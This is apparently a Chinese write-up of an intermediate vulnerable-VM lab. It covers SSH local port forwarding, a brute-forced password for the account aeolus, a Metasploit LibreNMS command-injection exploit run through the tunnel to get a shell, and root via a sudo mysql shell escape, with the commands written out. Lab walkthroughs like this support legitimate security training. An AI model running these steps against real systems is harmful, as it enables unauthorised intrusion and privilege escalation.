这个靶机的难度是中级,我觉得已经比较烧脑了。前面费时的信息收集和密码爆破过程就不重复了。通过ftp匿名登陆在/etc/samba/smb.conf文件中找到了账户aeolus,继续使用hydra和rockyou.txt字典爆破出密码sergioteamo。
今天主要详细讲述结合SSH端口转发,利用Metasploit工具进行内网渗透攻击提权。渗透之前有必要先一起学习了解一下SSH端口转发的知识。我们知道,SSH 会自动加密和解密所有SSH 客户端与服务端之间的网络数据。此外,SSH 还能够将其他TCP 端口的网络数据通过SSH 链接来转发,并且自动提供了相应的加密及解密服务。这一过程也被叫做“隧道”(tunneling),这是因为SSH 为其他TCP 链接提供了一个安全的通道来进行传输而得名。例如,Telnet,SMTP,LDAP 这些TCP 应用均能够从中得益,避免了用户名,密码以及隐私信息的明文传输。而与此同时,如果工作环境中的防火墙限制了一些网络端口的使用,但是允许SSH 的连接,也能够通过将TCP 端口转发来使用SSH 进行通讯。以下面这个示意图为例。当我们执行命令脚本:
ssh –L 9527:telnetsrv:23 -N sshsrv时,数据一旦telnet以后,数据会发送到本机9527端口,再在本机开一个随机端口,充当ssh客户端,再把数据流量发送到22端口的ssh服务端,收到数据以后,解密数据,临时开一个随机端口充当客户端,再把流量发送到23端口telnet服务端。
把
时间不早了,关键过程和截图贴出来。
1.信息收集过程
2.建立SS H隧道
在 Kali上执行:
ssh -L 8080:localhost:8080 aeolus@192.168.8.130
3.内网自动化渗透攻击
3.1寻找漏洞
3.2启用Metasploit
msf5 > use exploit/linux/http/librenms_addhost_cmd_inject
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set USERNAME aeolus
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set PASSWORD sergioteamo
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set RHOSTS localhost
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set RPORT 8080
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set LHOST eth0
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set LHOST 192.168.8.131(Kali)
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > run
到了这一步后目前账户是cronus,还是没有拿到root权限。这里我借助了一个神奇的网站gtfobins.github.io/。里面内容很丰富。
sudo mysql -e '! /bin/sh'一下,神奇的事情就发生了。
参考:
